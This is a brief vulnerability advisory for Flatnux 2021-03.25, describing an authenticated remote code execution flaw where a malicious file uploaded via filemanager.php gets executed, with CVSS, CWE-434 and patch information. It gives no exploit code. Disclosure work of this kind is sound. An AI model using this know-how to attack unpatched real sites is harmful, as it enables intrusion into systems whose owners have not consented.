vendor: Flatnux
by: Ömer Hasan Durmus
CVSS: 7.5 HIGH
Remote Code Execution
CWE: 434
Product Name: Flatnux
Affected Version From: 2021-03.25
Affected Version To: 2021-03.25
Patch Exists: YES
Related CWE:
CPE: a:altervista:flatnux
Platforms Tested: Windows/Linux
2021
flatnux-2021-03.25 – Remote Code Execution (Authenticated)
A vulnerability in Flatnux 2021-03.25 allows an authenticated user to execute arbitrary code by uploading a malicious file via the filemanager.php page. The vulnerability exists due to insufficient validation of user-supplied input. An attacker can exploit it by sending a specially crafted HTTP request containing malicious code to the vulnerable application. Successful exploitation could result in remote code execution.
Mitigation:
The vendor has released a patch to address this vulnerability. Users should update to the latest version of Flatnux.